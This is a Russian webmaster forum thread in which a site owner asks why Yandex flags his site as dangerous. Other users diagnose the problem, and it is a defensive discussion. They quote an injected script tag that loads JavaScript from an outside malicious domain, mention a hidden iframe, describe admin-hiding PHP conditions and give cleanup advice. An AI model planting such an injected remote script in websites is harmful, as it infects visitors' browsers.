Обнаружен вредоносный код. Вердикт Поведенческий анализ

Сообщений: 222 Регистрация: Сен 2011

23 Марта 2012 14:57

Здравствуйте Уважамые форумчане!
В вебмастере яндекса сайт помечен: обнаружен опасный код
Ни кликандеров, ни тизеров ничего никогда не ставил. Единственное, что стоит - реклама гугла
отправил повторную заявку на рассмотрение, ответили, что код ещё присутствует.
траф упал резко, каждому пользователю выводят предупреждение, что сайт заражён
страницы с вредоносным кодом:
http://cdelayremont.ru/vidy-zhalyuzi-dlya-okon
http://cdelayremont.ru/montazh-kanalizacii-svoimi-rukami
Спасибо:)
зы. раздел вроде тот

mayki

Сообщений: 294 Регистрация: Апр 2010

23 Марта 2012 15:26

Пробил страницу через поиск, предупреждения уже нет, при входе на сайт тоже.
Ивеняюсь, не углядел, есть предупреждение, но очень мелким шрифтом сразу не заметил.

Изменено: mayki - 23 Марта 2012 15:29

Информация для новичков о торговле на форекс http://forexluck.ru - рейтинг брокеров, бесплатные советники и индикаторы, стратегии трейдинга.

Yapy

Сообщений: 583 Регистрация: Дек 2011

23 Марта 2012 15:55

Что это?

Код
<script type="text/javascript" src='http://keywork.keycf.net/bob/js/mootols.js'></script>

И iframe там стоит тоже... smile:confused:

Изменено: Yapy - 23 Марта 2012 16:10

О сколько нам открытий чудных готовит продвиженья путь:
И Google, сын ошибок трудных, и Yandex, парадоксов друг :)
Дешёвый хостинг для новичков и про

Morrich

Сообщений: 222 Регистрация: Сен 2011

23 Марта 2012 17:45

Цитата

Yapy пишет:
Что это?

Код
<script type="text/javascript" src='http://keywork.keycf.net/bob/js/mootols.js'></script>

И iframe там стоит тоже... smile:confused:

убрал, спасибо!

откуда только взялось это чудо.. smile:confused:

Yapy

Сообщений: 583 Регистрация: Дек 2011

23 Марта 2012 18:39

Цитата
Morrich пишет: убрал, спасибо!

Перешёл на сайт: всё на месте: как iframe, так и javascript.

Цитата
Morrich пишет: откуда только взялось это чудо..

Вероятно, кто-то завладел доступом по фтп к вашему сайту. Проверьте логи фтп-доступа, если такая возможность имеется. Смените пароли.Или, завладели доступом к админке/управлению хостингом. Сделать проверку тоже лишним не будет. Так как если доступ всё еще есть у злоумышленника, то вредоносный код может появиться вновь в любой момент.

Макс

Сообщений: 6 Регистрация: Апр 2010

23 Марта 2012 18:40

До сих пор стоит! Тлько что зашел на указанные страницы, анти-вирус ругается.

thyssen

Сообщений: 44 Регистрация: Окт 2011

23 Марта 2012 19:17

Ага это чудо на месте стоит, script type="text/javascript" src='keywork.keycf.net/bob/js/mootols.js, на него ругаются антивирусы.

Детали заражения

[TABLE]

[TR][TD]URL:http://keywork.keycf.net/bob/js/mootols....[/TD][/TR]

[TR][TD]Процесс:C:\Program Files\Opera\opera.exe[/TD][/TR]

[TR][TD] Инфекция: URL:Mal[/TD][/TR]

[/TABLE]

Смотрите в футере.

Изменено: thyssen - 23 Марта 2012 19:23

Александр Зуев

Сообщений: 3 Регистрация: Фев 2012

23 Марта 2012 20:23

У меня такая проблема из-за рекламы от ТАК.РУ была

Morrich

Сообщений: 222 Регистрация: Сен 2011

23 Марта 2012 22:10

хах, когда залогинен админом, он не виден
выхожу - появляется
в футере всё удалил, теперь не знаю что искать:confused:

Yapy

Сообщений: 583 Регистрация: Дек 2011

#10

24 Марта 2012 00:41

Цитата
Morrich пишет: хах, когда залогинен админом, он не виден выхожу - появляется

Значит надо искать в php условия вида

Код
if($user_id!=1) {код;}

Готов попробовать помочь безвозмездно.
Пишите в ЛС, там могу дать ICQ.

margo

Сообщений: 657 Регистрация: Дек 2011

#11

24 Марта 2012 00:47

Аваст срабатывает на странице, кричит как потерпевший...

Олег Сообщений: 96 Регистрация: Янв 2012	#12 24 Марта 2012 02:07 Добрый вечер! Вчера проверил сайт на проиндексированность гугла и заметил такую ерунду... Кто-то у меня на сайте создал папку phpsmtp (так как сайт на джумла) в разделе libraries с фейком гугла! И страницы сгенерированные в этом разделе были посвящены андройду и всяким мобильникам, хотя сайт совершенно другой тематики. Так ещё и прогон по профилям форумов сделали, в общей сложности нашёл примерно 2600 ссылок на этот раздел сайта! Не знаю как я ещё бана не поймал от Яндекса... Снёс папку и с помощью 301 редиректа перенаправил ссылки на главную страницу, правильно ли я сделал? Или может надо было написать в Яндекс? Кстати при входе в пенель управления хостингом появляется сообщение, что кто-то завладел паролями к фтп и в связи с этим пароли были изменены... Менял 1000+ раз и это сообщение не пропадает! А винду переустанавливать очень проблематично... P.S.: Точно такую же папку нашел (с помощью поиска яндекса и гугла) ещё только на одном сайте... Прогоны были сделаны 23 февраля. ХЗ что и думать, как раз в этот момент заказывал 3 прогона от пользователей супра.

Похожие темы:

02.12.2017 09:39	Обнаружены нарушения или проблемы с безопасностью
28.05.2015 09:50	Яндекс: На сайте обнаружены скрытые ссылки
23.05.2015 18:50	Яндекс нашел вредоносный код
11.04.2014 23:06	Вредоносный код
25.08.2013 21:45	Вредоносный код на сайте

Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)

Новые темы	Объявления	Свободное общение
00:23 Раскрутка форума 00:19 Продвижение по ключам 17:40 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 14:07 2Index - быстрая индексация страниц сайта и обратных ссылок 12:02 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 22:23 Подскажите нормальный сервис накрутки ПФ 09:57 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг	20:30 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 19:53 №1 Рассылка / Инвайтинг [TELEGRAM] \| Приватный метод 19:52 Trustpilot Reviews \| Подниму рейтинг вашей компании 19:52 Продвижение YouTube видео в топ поиска \| Любой тип контента \| Гарантия результата 19:52 Установка\|Настройка\|Доработка\|Наполнение сайтов\|Дизайн\|3D\|Видеомонтаж 13:23 Рассылки СМС/SMS, Вайбер/Viber, Ватсап/Whatsapp, Телеграм/Telegram любой тематики по всему миру 13:08 AlwaysMoney - платформа для обмена криптовалют	16:49 monetizer.agency – рекламная сеть для взрослого и развлекательного трафика. 100$ новому вебмастеру 20:43 Добро пожаловать в цифровой мир... 15:59 Про мясо 23:09 ПП от PMS remote.team - 200$ за команду 13:28 Компьютерная мышь 22:55 Ну что, кто куда деваете свои сайты? 22:34 Используете беспроводные наушники?